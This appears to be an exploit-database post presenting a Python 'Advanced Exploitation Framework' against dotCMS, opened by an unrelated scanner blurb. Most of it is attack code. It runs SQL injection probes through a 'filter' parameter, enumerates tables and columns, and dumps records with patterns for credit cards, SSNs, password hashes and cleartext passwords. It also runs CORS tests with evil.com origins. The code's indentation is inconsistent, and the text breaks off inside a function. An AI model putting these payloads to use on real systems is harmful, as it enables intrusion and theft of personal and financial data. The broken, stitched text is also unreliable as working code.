This tool is designed to proactively identify potential security weaknesses within the dotCMS core, installed plugins, custom code, and server configurations. It automates the detection of common vulnerabilities like XSS, SQL injection, misconfigurations, and outdated components.
The scanner provides actionable insights and detailed reports, empowering developers and administrators to promptly address and remediate identified risks. This feature significantly bolsters the platform's overall security posture, ensuring greater data integrity and compliance for dotCMS users.
=============================================================================================================================================
| # Title : dotCMS v24.04.24 lts v23 Advanced Exploitation Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/dotCMS/core/releases/tag/v24.04.24_lts_v23 |
=============================================================================================================================================
[+] References :
[+] Summary : This Python-based framework is designed for authorized penetration testing of DotCMS applications. It provides a comprehensive exploitation workflow, including:
Evidence Collection: Stores requests, responses, and screenshots in a SQLite database.
Reconnaissance: Checks TLS/SSL, analyzes CORS settings, and asynchronously discovers endpoints.
Vulnerability Assessment: Performs advanced SQL Injection testing (Time-Based, Error-Based, Boolean-Based, Union-Based).
Exploitation: Extracts user data, hunts for JWT tokens, and tests for file inclusion (LFI) vulnerabilities.
Post-Exploitation: Dumps configuration files and identifies sensitive data leaks.
Reporting: Generates detailed penetration testing reports and execution statistics.
[+] Key Features:
Asynchronous and synchronous scanning.
PoC evidence storage and logging.
Supports extraction of users, JWTs, and sensitive configuration files.
Generates professional reports with recommendations.
Legal-use enforcement with explicit authorization confirmation.
[+] Usage : * : Save as: poc.py
Run : python poc.py -t 127.0.0.1
python3 poc.py -t https://demo.dotcms.com --full
# Database Enumeration Only
python3 poc.py -t https://demo.dotcms.com --database
# Quick Scan
python3 poc.py -t https://demo.dotcms.com --quick
[+] POC :
#!/usr/bin/env python3
"""
DotCMS Advanced Exploitation Framework - by indoushka
"""
import os
import sys
import json
import time
import re
import argparse
import hashlib
import base64
import sqlite3
import asyncio
import aiohttp
import ssl
import socket
import csv
from datetime import datetime
from urllib.parse import urljoin, quote, urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import init, Fore, Style, Back
import warnings
warnings.filterwarnings("ignore")
init(autoreset=True)
class EvidenceCollector:
    """Collects and stores PoC evidence.

    On construction a timestamped ``evidence_<YYYYmmdd_HHMMSS>`` directory is
    created in the current working directory.  It holds a SQLite database
    (``evidence.db``) plus one text file per recorded finding.
    """

    # Executed on every init; IF NOT EXISTS keeps re-initialisation harmless.
    _SCHEMA = (
        '''
        CREATE TABLE IF NOT EXISTS evidence (
            id INTEGER PRIMARY KEY,
            timestamp TEXT,
            vulnerability TEXT,
            endpoint TEXT,
            payload TEXT,
            request TEXT,
            response TEXT,
            screenshot_path TEXT,
            severity TEXT,
            cvss_score REAL,
            cwe_id INTEGER,
            verified INTEGER DEFAULT 0
        )
        ''',
        '''
        CREATE TABLE IF NOT EXISTS extracted_data (
            id INTEGER PRIMARY KEY,
            timestamp TEXT,
            data_type TEXT,
            data_value TEXT,
            source TEXT,
            hash TEXT
        )
        ''',
    )

    def __init__(self, target):
        """Create the evidence directory and database for *target*."""
        self.target = target
        timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
        self.evidence_dir = f"evidence_{timestamp}"
        os.makedirs(self.evidence_dir, exist_ok=True)
        self.evidence_db = f"{self.evidence_dir}/evidence.db"
        self.init_database()

    @staticmethod
    def _safe_filename(name):
        """Return *name* reduced to characters that are safe in a file name.

        Runs of anything other than letters, digits, ``.``, ``_`` and ``-``
        become a single ``_``; leading/trailing dots and underscores are
        dropped so the result can never walk out of the evidence directory.
        """
        cleaned = re.sub(r'[^A-Za-z0-9._-]+', '_', str(name)).strip('._')
        return cleaned or 'evidence'

    def init_database(self):
        """Create the ``evidence`` and ``extracted_data`` tables if missing."""
        conn = sqlite3.connect(self.evidence_db)
        try:
            # ``with conn`` commits on success and rolls back on error; the
            # ``finally`` guarantees the handle is closed either way.
            with conn:
                for statement in self._SCHEMA:
                    conn.execute(statement)
        finally:
            conn.close()

    def add_evidence(self, vuln_type, endpoint, payload, request, response, severity="High", cvss=7.5, cwe=None):
        """Persist one finding to disk and to the evidence database.

        Args:
            vuln_type: Short label for the finding; also used (sanitised) as
                the prefix of the evidence file name.
            endpoint: Endpoint the finding relates to.
            payload: Payload string that produced the finding.
            request: Textual form of the request that was sent.
            response: Response text (or excerpt) that was received.
            severity: Severity label stored with the record.
            cvss: CVSS score stored with the record.
            cwe: Optional CWE identifier stored with the record.

        Returns:
            The integer row id of the inserted ``evidence`` record.
        """
        now = datetime.now()
        # Microseconds keep two findings of the same type recorded within one
        # second from overwriting each other's file.
        screenshot = (
            f"{self.evidence_dir}/"
            f"{self._safe_filename(vuln_type)}_{now.strftime('%H%M%S_%f')}.txt"
        )
        with open(screenshot, 'w', encoding='utf-8') as f:
            f.write(f"REQUEST:\n{request}\n\nRESPONSE:\n{response}")

        conn = sqlite3.connect(self.evidence_db)
        try:
            with conn:
                cursor = conn.execute('''
                    INSERT INTO evidence
                    (timestamp, vulnerability, endpoint, payload, request, response, screenshot_path, severity, cvss_score, cwe_id)
                    VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
                ''', (now.isoformat(), vuln_type, endpoint, payload, request, response,
                      screenshot, severity, cvss, cwe))
                evidence_id = cursor.lastrowid
        finally:
            conn.close()

        print(f"{Fore.GREEN}[+] Evidence recorded (ID: {evidence_id}) for {vuln_type}")
        return evidence_id
class DatabaseEnumerator:
"""Advanced database enumeration and dumping"""
def __init__(self, exploiter):
self.exploiter = exploiter
self.db_info = {}
self.tables = []
self.columns = {}
self.data_dumps = {}
def identify_database(self, vulnerable_endpoint):
    """Probe *vulnerable_endpoint* to guess the backing database engine.

    Each candidate engine's probe strings are sent one at a time in the
    ``filter`` query parameter.  A probe containing ``sleep``/``waitfor`` that
    takes longer than 1.5 s, or a response body containing the engine's
    marker text, sets ``self.db_info['type']``.  If nothing matches, the type
    is recorded as ``'Unknown'``.  ``get_database_version`` is always called
    before returning.

    Returns:
        The ``self.db_info`` dictionary.
    """
    log = self.exploiter.log
    log("[*] Identifying database type...", 'info')

    fingerprints = (
        ('MySQL', ("' AND @@version like '%MySQL%'--", "' AND SLEEP(2)--")),
        ('PostgreSQL', ("' AND version() like '%PostgreSQL%'--", "' AND pg_sleep(2)--")),
        ('MSSQL', ("' AND @@version like '%Microsoft%'--", "' AND WAITFOR DELAY '00:00:02'--")),
        ('Oracle', ("' AND (SELECT banner FROM v$version) like '%Oracle%'--",
                    "' AND dbms_pipe.receive_message(('a'),2)--")),
    )
    # Text looked for in the response body, per engine.
    body_markers = {'MySQL': 'MySQL', 'PostgreSQL': 'PostgreSQL', 'MSSQL': 'Microsoft'}

    for engine, probes in fingerprints:
        for probe in probes:
            try:
                began = time.time()
                reply = self.exploiter.session.get(
                    urljoin(self.exploiter.target, vulnerable_endpoint),
                    params={'filter': probe},
                    timeout=10,
                )
                took = time.time() - began

                lowered = probe.lower()
                delay_probe = 'sleep' in lowered or 'waitfor' in lowered
                if delay_probe and took > 1.5:
                    self.db_info['type'] = engine
                    log(f"[+] Database identified as: {engine}", 'success')
                    break

                marker = body_markers.get(engine)
                if marker is not None and marker in reply.text:
                    self.db_info['type'] = engine
                    break
            except Exception:
                # Best effort: a failed probe just moves on to the next one.
                continue
        if 'type' in self.db_info:
            break

    if 'type' not in self.db_info:
        log("[-] Could not identify database type", 'warning')
        self.db_info['type'] = 'Unknown'

    self.get_database_version(vulnerable_endpoint)
    return self.db_info
def get_database_version(self, vulnerable_endpoint):
    """Try to read a version string for the engine in ``self.db_info['type']``.

    Sends one engine-specific probe in the ``filter`` parameter and stores the
    first regex hit found in the response body under
    ``self.db_info['version']``.  Does nothing when the engine has no probe
    defined.  Request errors are logged, not raised.
    """
    probes = {
        'MySQL': "' UNION SELECT @@version,NULL,NULL--",
        'PostgreSQL': "' UNION SELECT version(),NULL,NULL--",
        'MSSQL': "' UNION SELECT @@version,NULL,NULL--",
        'Oracle': "' UNION SELECT banner FROM v$version WHERE rownum=1--"
    }
    engine = self.db_info.get('type')
    if engine not in probes:
        return
    probe = probes[engine]

    try:
        reply = self.exploiter.session.get(
            urljoin(self.exploiter.target, vulnerable_endpoint),
            params={'filter': probe},
            timeout=10,
        )
        # Patterns are tried in this order; the first one that hits wins.
        candidates = (
            r'\d+\.\d+\.\d+',
            r'PostgreSQL \d+\.\d+',
            r'Microsoft SQL Server \d{4}',
            r'Oracle Database \d+g',
        )
        hits = (re.search(regex, reply.text) for regex in candidates)
        found = next((hit for hit in hits if hit), None)
        if found:
            self.db_info['version'] = found.group()
            self.exploiter.log(f"[+] Database version: {self.db_info['version']}", 'success')
    except Exception as e:
        self.exploiter.log(f"[-] Failed to get version: {str(e)}", 'error')
def enumerate_tables(self, vulnerable_endpoint, limit=50):
    """Collect candidate table names from responses of *vulnerable_endpoint*.

    Up to two engine-specific probes are sent.  Every regex hit in the
    response body that is longer than three characters and not one of a few
    SQL keywords is kept as a candidate, up to *limit*.  The sorted,
    de-duplicated result is stored in ``self.tables`` and, when non-empty,
    written to ``database_tables.json`` in the exploiter's results directory.

    Returns:
        ``self.tables`` (a list of strings, possibly empty).
    """
    log = self.exploiter.log
    log(f"[*] Enumerating database tables (limit: {limit})...", 'info')

    probes_by_engine = {
        'MySQL': [
            f"' UNION SELECT table_name,NULL,NULL FROM information_schema.tables LIMIT {limit}--",
            f"' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables LIMIT {limit}--"
        ],
        'PostgreSQL': [
            f"' UNION SELECT tablename,NULL,NULL FROM pg_tables LIMIT {limit}--",
            f"' UNION SELECT schemaname,tablename,NULL FROM pg_tables LIMIT {limit}--"
        ],
        'MSSQL': [
            "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
            "' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables--"
        ]
    }
    # NOTE: 'passw(or)?d' has a capturing group, so re.findall yields the
    # group text for that pattern rather than the whole match.
    name_patterns = [
        r'[a-zA-Z_][a-zA-Z0-9_]*',
        r'user[s_]?', r'admin[s_]?', r'passw(or)?d', r'credit', r'account',
        r'customer', r'client', r'order', r'transaction', r'payment',
        r'config', r'setting', r'log', r'audit', r'session',
        r'token', r'api', r'key', r'secret'
    ]
    skipped_words = ['null', 'select', 'union', 'from']

    collected = []
    engine = self.db_info.get('type')
    if engine in probes_by_engine:
        for probe in probes_by_engine[engine][:2]:
            try:
                reply = self.exploiter.session.get(
                    urljoin(self.exploiter.target, vulnerable_endpoint),
                    params={'filter': probe},
                    timeout=15,
                )
                for regex in name_patterns:
                    for token in re.findall(regex, reply.text, re.IGNORECASE):
                        if len(token) <= 3 or token.lower() in skipped_words:
                            continue
                        if token in collected:
                            continue
                        collected.append(token)
                        if len(collected) >= limit:
                            break
                    if len(collected) >= limit:
                        break
                # The second probe is only a fallback for an empty first try.
                if collected:
                    break
            except Exception as e:
                log(f"[-] Table enumeration failed: {str(e)}", 'error')

    ordered = sorted({name for name in collected if isinstance(name, str)})
    self.tables = ordered[:limit]

    if self.tables:
        log(f"[+] Found {len(self.tables)} potential tables:", 'success')
        for position, name in enumerate(self.tables[:20], 1):
            log(f" {position:2}. {name}", 'success')
        with open(f"{self.exploiter.results_dir}/database_tables.json", 'w') as f:
            json.dump(self.tables, f, indent=2)
    return self.tables
def enumerate_columns(self, vulnerable_endpoint, table_name):
    """Collect candidate column names for *table_name*.

    Up to two engine-specific probes are sent.  Regex hits in the response
    body longer than two characters (and not a listed SQL keyword) are kept.
    The sorted, de-duplicated list is stored in ``self.columns[table_name]``.

    Returns:
        The list of candidate column names (possibly empty).
    """
    log = self.exploiter.log
    log(f"[*] Enumerating columns for table: {table_name}", 'info')

    probes_by_engine = {
        'MySQL': [
            f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--",
            f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
        ],
        'PostgreSQL': [
            f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--",
            f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
        ],
        'MSSQL': [
            f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
        ]
    }
    name_patterns = [
        r'[a-zA-Z_][a-zA-Z0-9_]*',
        r'user', r'pass', r'email', r'name', r'address',
        r'phone', r'credit', r'card', r'account',
        r'token', r'session', r'key', r'secret',
        r'salary', r'price', r'amount', r'balance',
        r'birth', r'ssn', r'social', r'security',
        r'ip', r'mac', r'device', r'browser'
    ]
    skipped_words = ['null', 'select', 'union', 'from', 'where']

    collected = []
    engine = self.db_info.get('type')
    if engine in probes_by_engine:
        for probe in probes_by_engine[engine][:2]:
            try:
                reply = self.exploiter.session.get(
                    urljoin(self.exploiter.target, vulnerable_endpoint),
                    params={'filter': probe},
                    timeout=15,
                )
                for regex in name_patterns:
                    for token in re.findall(regex, reply.text, re.IGNORECASE):
                        acceptable = len(token) > 2 and token.lower() not in skipped_words
                        if acceptable and token not in collected:
                            collected.append(token)
                # The second probe is only a fallback for an empty first try.
                if collected:
                    break
            except Exception as e:
                log(f"[-] Column enumeration failed: {str(e)}", 'error')

    columns = sorted({name for name in collected if isinstance(name, str)})
    self.columns[table_name] = columns

    if columns:
        log(f"[+] Found {len(columns)} potential columns for {table_name}:", 'success')
        for position, name in enumerate(columns[:15], 1):
            log(f" {position:2}. {name}", 'success')
    return columns
def dump_table_data(self, vulnerable_endpoint, table_name, columns=None, limit=100):
    """Collect records for *table_name* from responses of *vulnerable_endpoint*.

    When *columns* is empty the cached ``self.columns[table_name]`` is used,
    falling back to ``['*']``.  Only the first five columns are requested.
    Each response line is parsed twice: as a ``|``-separated record, and
    against a list of data-shaped regexes (e-mail, phone, hashes, ...).

    Non-empty results are stored in ``self.data_dumps[table_name]`` (capped
    at *limit*) and written to ``dump_<table>.json``; a CSV copy is written
    on a best-effort basis.

    Returns:
        The full list of collected record dictionaries (possibly empty).
    """
    log = self.exploiter.log
    log(f"[*] Dumping data from table: {table_name} (limit: {limit})", 'info')

    if not columns and table_name in self.columns:
        columns = self.columns[table_name]
    if not columns:
        log(f"[-] No columns found for table {table_name}", 'warning')
        columns = ['*']

    # Only the first five columns take part in the initial dump.
    head = columns[:5]
    width = len(head)
    col_string = '*' if columns == ['*'] else ','.join(head)

    probes_by_engine = {
        'MySQL': [
            f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--",
            f"' UNION SELECT CONCAT_WS('|',{col_string}) FROM {table_name} LIMIT {limit}--"
        ],
        'PostgreSQL': [
            f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--",
            f"' UNION SELECT {col_string}||'|' FROM {table_name} LIMIT {limit}--"
        ],
        'MSSQL': [
            f"' UNION SELECT {col_string} FROM {table_name}--",
            f"' UNION SELECT {col_string}+'|' FROM {table_name}--"
        ]
    }
    data_patterns = [
        # Email patterns
        r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
        # Phone numbers
        r'[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}',
        # Credit cards
        r'\b(?:\d[ -]*?){13,16}\b',
        # Dates
        r'\d{1,2}[/-]\d{1,2}[/-]\d{2,4}',
        # URLs
        r'https?://[^\s<>"\']+',
        # IP addresses
        r'\b(?:\d{1,3}\.){3}\d{1,3}\b',
        # Social security
        r'\d{3}-\d{2}-\d{4}',
        # Passwords/Hashes
        r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+',  # bcrypt
        r'[a-fA-F0-9]{32}',  # MD5
        r'[a-fA-F0-9]{40}',  # SHA1
        r'[a-fA-F0-9]{64}',  # SHA256
    ]

    dumped_data = []
    engine = self.db_info.get('type')
    if engine in probes_by_engine:
        for probe in probes_by_engine[engine][:2]:
            try:
                reply = self.exploiter.session.get(
                    urljoin(self.exploiter.target, vulnerable_endpoint),
                    params={'filter': probe},
                    timeout=20,
                )
                for line in reply.text.split('\n'):
                    # Pipe-separated rows become column -> value records.
                    if '|' in line and len(line.strip()) > 5:
                        pieces = line.split('|')
                        if len(pieces) >= width:
                            record = dict(zip(head, (piece.strip() for piece in pieces)))
                            if record:
                                dumped_data.append(record)
                    # Independently, keep any data-shaped substring not seen yet.
                    for regex in data_patterns:
                        for hit in re.findall(regex, line):
                            if len(hit) > 3 and not any(hit in str(row) for row in dumped_data):
                                dumped_data.append({'extracted_data': hit, 'source': line[:50]})
                # The second probe is only a fallback for an empty first try.
                if dumped_data:
                    break
            except Exception as e:
                log(f"[-] Data dump failed: {str(e)}", 'error')

    if dumped_data:
        self.data_dumps[table_name] = dumped_data[:limit]

        json_file = f"{self.exploiter.results_dir}/dump_{table_name}.json"
        with open(json_file, 'w', encoding='utf-8') as f:
            json.dump(dumped_data, f, indent=2, default=str)

        csv_file = f"{self.exploiter.results_dir}/dump_{table_name}.csv"
        try:
            if all(isinstance(row, dict) for row in dumped_data):
                header = set()
                for row in dumped_data:
                    header.update(row.keys())
                with open(csv_file, 'w', newline='', encoding='utf-8') as f:
                    writer = csv.DictWriter(f, fieldnames=list(header))
                    writer.writeheader()
                    writer.writerows(dumped_data)
        except:
            # CSV export is best effort; the JSON file is the primary output.
            pass

        log(f"[+] Dumped {len(dumped_data)} records from {table_name}", 'success')
        log(f"[+] Data saved to: {json_file}", 'success')
        log(f"[*] Sample data from {table_name}:", 'info')
        for position, row in enumerate(dumped_data[:3], 1):
            log(f" Record {position}: {str(row)[:100]}...", 'info')
    return dumped_data
def search_cleartext_data(self, vulnerable_endpoint, search_terms=None):
    """Look for sensitively named columns and short non-hash values.

    Phase 1 sends, per search term, up to two engine-specific probes and
    records every regex hit containing the term (hit -> term).  Phase 2
    requests values for each hit of the form ``table.column`` and keeps
    response lines that are 4-99 characters long and do not look like a
    bcrypt string or hex digest.  Non-empty findings are written to
    ``cleartext_search.json`` in the exploiter's results directory.

    Args:
        vulnerable_endpoint: Endpoint path the probes are sent to.
        search_terms: Optional list of terms; a built-in list is used when
            empty or ``None``.

    Returns:
        A ``(found_data, extracted_cleartext)`` tuple of dictionaries.
    """
    log = self.exploiter.log
    log("[*] Searching for cleartext sensitive data...", 'info')

    if not search_terms:
        search_terms = [
            'password', 'passwd', 'pwd', 'secret', 'token', 'key',
            'credit', 'card', 'account', 'ssn', 'social', 'security',
            'salary', 'income', 'balance', 'address', 'phone',
            'email', 'username', 'login', 'admin', 'root'
        ]

    engine = self.db_info.get('type')

    # Phase 1: locate columns whose name contains a search term.
    found_data = {}
    for term in search_terms:
        log(f"[*] Searching for: {term}", 'info')
        probes_by_engine = {
            'MySQL': [
                f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--",
                f"' UNION SELECT CONCAT(table_name,'.',column_name),NULL,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
            ],
            'PostgreSQL': [
                f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
            ],
            'MSSQL': [
                f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
            ]
        }
        if engine not in probes_by_engine:
            continue
        for probe in probes_by_engine[engine][:2]:
            try:
                reply = self.exploiter.session.get(
                    urljoin(self.exploiter.target, vulnerable_endpoint),
                    params={'filter': probe},
                    timeout=15,
                )
                term_patterns = [
                    rf'{term}',
                    rf'[a-zA-Z_][a-zA-Z0-9_]*{term}[a-zA-Z0-9_]*',
                    rf'[a-zA-Z_][a-zA-Z0-9_]*\.{term}[a-zA-Z0-9_]*'
                ]
                for regex in term_patterns:
                    for hit in re.findall(regex, reply.text, re.IGNORECASE):
                        if hit not in found_data:
                            found_data[hit] = term
                if term in found_data:
                    break
            except Exception:
                continue

    # Phase 2: pull values for every "table.column" reference found above.
    extracted_cleartext = {}
    for column_ref in found_data:
        if '.' not in column_ref:
            continue
        table, column = column_ref.split('.', 1)
        value_probes = {
            'MySQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--",
            'PostgreSQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--",
            'MSSQL': f"' UNION SELECT {column} FROM {table}--"
        }
        if engine not in value_probes:
            continue
        try:
            reply = self.exploiter.session.get(
                urljoin(self.exploiter.target, vulnerable_endpoint),
                params={'filter': value_probes[engine]},
                timeout=15,
            )
            for raw_line in reply.text.split('\n'):
                line = raw_line.strip()
                if not 3 < len(line) < 100:
                    continue
                # Skip bcrypt strings and bare hex digests.
                if line.startswith('$2') or re.match(r'^[a-fA-F0-9]{32,128}$', line):
                    continue
                values = extracted_cleartext.setdefault(column, [])
                if line not in values:
                    values.append(line)
        except Exception:
            continue

    if found_data or extracted_cleartext:
        results = {
            'sensitive_columns': found_data,
            'cleartext_data': extracted_cleartext
        }
        results_file = f"{self.exploiter.results_dir}/cleartext_search.json"
        with open(results_file, 'w', encoding='utf-8') as f:
            json.dump(results, f, indent=2)

        if found_data:
            log("[+] Found sensitive columns:", 'success')
            for col in list(found_data.keys())[:10]:
                log(f" ? {col}", 'success')
        if extracted_cleartext:
            log("[+] Found cleartext data:", 'success')
            for col, data in extracted_cleartext.items():
                log(f" ? {col}: {data[:3]}...", 'success')
    return found_data, extracted_cleartext
def comprehensive_database_dump(self, vulnerable_endpoint):
    """Run the whole enumeration workflow against *vulnerable_endpoint*.

    Steps: identify the engine, enumerate up to 30 tables, pick tables whose
    name contains an "interesting" substring (topped up with up to five
    others when fewer than five were picked), enumerate columns and collect
    data for at most ten of them, search for cleartext values, then write
    the report.

    Returns:
        A dictionary with keys ``database_info``, ``tables``,
        ``dumped_data``, ``sensitive_columns`` and ``cleartext_data``.
    """
    log = self.exploiter.log
    log("\n" + "="*80, 'info')
    log("COMPREHENSIVE DATABASE DUMP", 'section')
    log("="*80, 'info')

    db_info = self.identify_database(vulnerable_endpoint)
    tables = self.enumerate_tables(vulnerable_endpoint, limit=30)

    interesting_patterns = [
        'user', 'admin', 'pass', 'account', 'customer',
        'client', 'order', 'payment', 'credit', 'card',
        'config', 'setting', 'token', 'session', 'log'
    ]
    interesting_tables = [
        name for name in tables
        if any(fragment in name.lower() for fragment in interesting_patterns)
    ]
    # Top up with other tables when too few looked interesting.
    if len(interesting_tables) < 5 and len(tables) > 5:
        leftovers = [name for name in tables if name not in interesting_tables]
        interesting_tables.extend(leftovers[:5])

    all_dumped_data = {}
    for name in interesting_tables[:10]:
        try:
            columns = self.enumerate_columns(vulnerable_endpoint, name)
            if columns:
                rows = self.dump_table_data(vulnerable_endpoint, name, columns, limit=50)
                if rows:
                    all_dumped_data[name] = rows
            time.sleep(1)  # Rate limiting
        except Exception as e:
            log(f"[-] Failed to dump {name}: {str(e)}", 'error')

    sensitive_cols, cleartext_data = self.search_cleartext_data(vulnerable_endpoint)
    self.generate_database_report(db_info, tables, all_dumped_data, sensitive_cols, cleartext_data)

    return {
        'database_info': db_info,
        'tables': tables,
        'dumped_data': all_dumped_data,
        'sensitive_columns': sensitive_cols,
        'cleartext_data': cleartext_data
    }
def generate_database_report(self, db_info, tables, dumped_data, sensitive_cols, cleartext_data):
"""Generate comprehensive database report"""
report = f"""
{'='*80}
DATABASE PENETRATION TEST REPORT
{'='*80}
Database Type: {db_info.get('type', 'Unknown')}
Database Version: {db_info.get('version', 'Unknown')}
Total Tables Found: {len(tables)}
Tables Dumped: {len(dumped_data)}
Sensitive Columns: {len(sensitive_cols)}
Cleartext Data Found: {sum(len(v) for v in cleartext_data.values())}
TABLE ENUMERATION
{'-'*80}
"""
for i, table in enumerate(tables[:50], 1):
report += f"{i:3}. {table}\n"
report += f"""
DATA DUMP SUMMARY
{'-'*80}
"""
for table, data in dumped_data.items():
report += f"\n{table}:\n"
report += f" Records dumped: {len(data)}\n"
if data and isinstance(data[0], dict):
sample_keys = list(data[0].keys())[:3]
report += f" Sample columns: {', '.join(sample_keys)}\n"
# Show sample data
if data:
report += f" Sample record: {str(data[0])[:100]}...\n"
report += f"""
SENSITIVE COLUMNS FOUND
{'-'*80}
"""
for col, term in list(sensitive_cols.items())[:20]:
report += f"? {col} (contains: {term})\n"
report += f"""
CLEARTEXT DATA DISCOVERED
{'-'*80}
"""
for column, values in cleartext_data.items():
report += f"\n{column}:\n"
for value in values[:5]:
report += f" ? {value}\n"
if len(values) > 5:
report += f" ... and {len(values) - 5} more\n"
report += f"""
SECURITY FINDINGS
{'-'*80}
1. Database exposed via SQL injection
2. {len(sensitive_cols)} sensitive columns identified
3. {sum(len(v) for v in cleartext_data.values())} cleartext sensitive values found
4. {len(dumped_data)} tables successfully dumped
RECOMMENDATIONS
{'-'*80}
1. Immediate patch of SQL injection vulnerabilities
2. Encrypt all sensitive data at rest
3. Implement proper access controls to database
4. Conduct security audit of all database queries
5. Implement database activity monitoring
6. Rotate all exposed credentials immediately
{'='*80}
END OF DATABASE REPORT
{'='*80}
"""
report_file = f"{self.exploiter.results_dir}/database_penetration_report.txt"
with open(report_file, 'w', encoding='utf-8') as f:
f.write(report)
self.exploiter.log(f"[+] Database report generated: {report_file}", 'success')
# Also save comprehensive JSON
comprehensive_data = {
'database_info': db_info,
'all_tables': tables,
'dumped_tables': list(dumped_data.keys()),
'sensitive_columns': sensitive_cols,
'cleartext_data': cleartext_data,
'dump_summary': {table: len(data) for table, data in dumped_data.items()}
}
json_file = f"{self.exploiter.results_dir}/database_comprehensive.json"
with open(json_file, 'w', encoding='utf-8') as f:
json.dump(comprehensive_data, f, indent=2)
return report
# Main exploitation class: DotCMSExploiter (the original non-ASCII comment was lost to an encoding error)
class DotCMSExploiter:
"""Main exploitation class - Enhanced with Database Enumeration"""
def __init__(self, target):
    """Prepare collectors, counters, the results directory and HTTP session.

    Args:
        target: Base URL of the system under test; a trailing ``/`` is
            stripped before it is stored on ``self.target``.
    """
    self.target = target.rstrip('/')
    self.evidence = EvidenceCollector(target)
    self.db_enumerator = DatabaseEnumerator(self)  # Initialize DB enumerator

    # Run counters, all starting at zero.
    self.stats = dict.fromkeys(
        (
            'vulnerabilities',
            'users_extracted',
            'tokens_found',
            'databases_found',
            'files_leaked',
            'tables_enumerated',
            'records_dumped',
        ),
        0,
    )

    # Per-run output directory, named after the start time.
    started = datetime.now().strftime('%Y%m%d_%H%M%S')
    self.results_dir = f"results_{started}"
    os.makedirs(self.results_dir, exist_ok=True)

    import requests
    browser_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'keep-alive'
    }
    self.session = requests.Session()
    self.session.verify = False
    # NOTE(review): requests documents timeouts as a per-request argument;
    # confirm whether this attribute has any effect on the session.
    self.session.timeout = 30
    self.session.headers.update(browser_headers)

    # Certificate verification is off above, so silence the related warnings.
    import urllib3
    urllib3.disable_warnings()

    banner_rule = '=' * 80
    print(f"{Fore.CYAN}{banner_rule}")
    print(f"{Fore.YELLOW} DotCMS Advanced Exploitation Framework")
    print(f"{Fore.YELLOW} Enhanced with Database Enumeration")
    print(f"{Fore.CYAN}{banner_rule}{Style.RESET_ALL}")
def log(self, message, level='info'):
    """Print *message* in the colour for *level* and append it to the run log.

    Unknown levels are printed with ``Fore.RESET``.  The uncoloured line is
    appended to ``execution.log`` inside ``self.results_dir``.
    """
    palette = {
        'success': Fore.GREEN + Style.BRIGHT,
        'error': Fore.RED + Style.BRIGHT,
        'warning': Fore.YELLOW + Style.BRIGHT,
        'info': Fore.CYAN,
        'critical': Fore.RED + Back.WHITE + Style.BRIGHT,
        'debug': Fore.LIGHTBLACK_EX,
        'section': Fore.MAGENTA + Style.BRIGHT,
    }
    tint = palette[level] if level in palette else Fore.RESET
    stamp = datetime.now().strftime('%H:%M:%S')
    line = f"[{stamp}] {message}"

    print(f"{tint}{line}{Style.RESET_ALL}")
    with open(f"{self.results_dir}/execution.log", 'a', encoding='utf-8') as log_file:
        log_file.write(f"{line}\n")
def check_tls(self):
"""Check TLS/SSL configuration"""
self.log("[*] Checking TLS/SSL configuration...", 'info')
try:
parsed = urlparse(self.target)
hostname = parsed.hostname
port = parsed.port or 443
context = ssl.create_default_context()
with socket.create_connection((hostname, port), timeout=10) as sock:
with context.wrap_socket(sock, server_hostname=hostname) as ssock:
cert = ssock.getpeercert()
# Check certificate expiry
if 'notAfter' in cert:
expires = datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
days_to_expire = (expires - datetime.now()).days
if days_to_expire < 30:
self.log(f"[-] Certificate expires in {days_to_expire} days", 'warning')
else:
self.log(f"[+] Certificate valid for {days_to_expire} days", 'success')
# Get SSL/TLS version
ssl_version = ssock.version()
self.log(f"[+] SSL/TLS Version: {ssl_version}", 'success')
except Exception as e:
self.log(f"[-] TLS check failed: {str(e)}", 'error')
def cors_analysis(self):
"""Analyze CORS configuration"""
self.log("[*] Analyzing CORS configuration...", 'info')
test_origins = [
'https://evil.com',
'http://evil.com',
'null',
self.target.replace('https://', 'http://'),
]
vulnerable = False
for origin in test_origins:
headers = {'Origin': origin}
try:
response = self.session.get(self.target, headers=headers, timeout=10)
if 'Access-Control-Allow-Origin' in response.headers:
allowed_origin = response.headers['Access-Control-Allow-Origin']
if allowed_origin == origin or allowed_origin == '*':
self.log(f"[!] CORS Misconfiguration: {allowed_origin}", 'warning')
vulnerable = True
if 'Access-Control-Allow-Credentials' in response.headers:
if response.headers['Access-Control-Allow-Credentials'].lower() == 'true':
self.log(f"[!] CORS with credentials allowed!", 'critical')
except Exception as e:
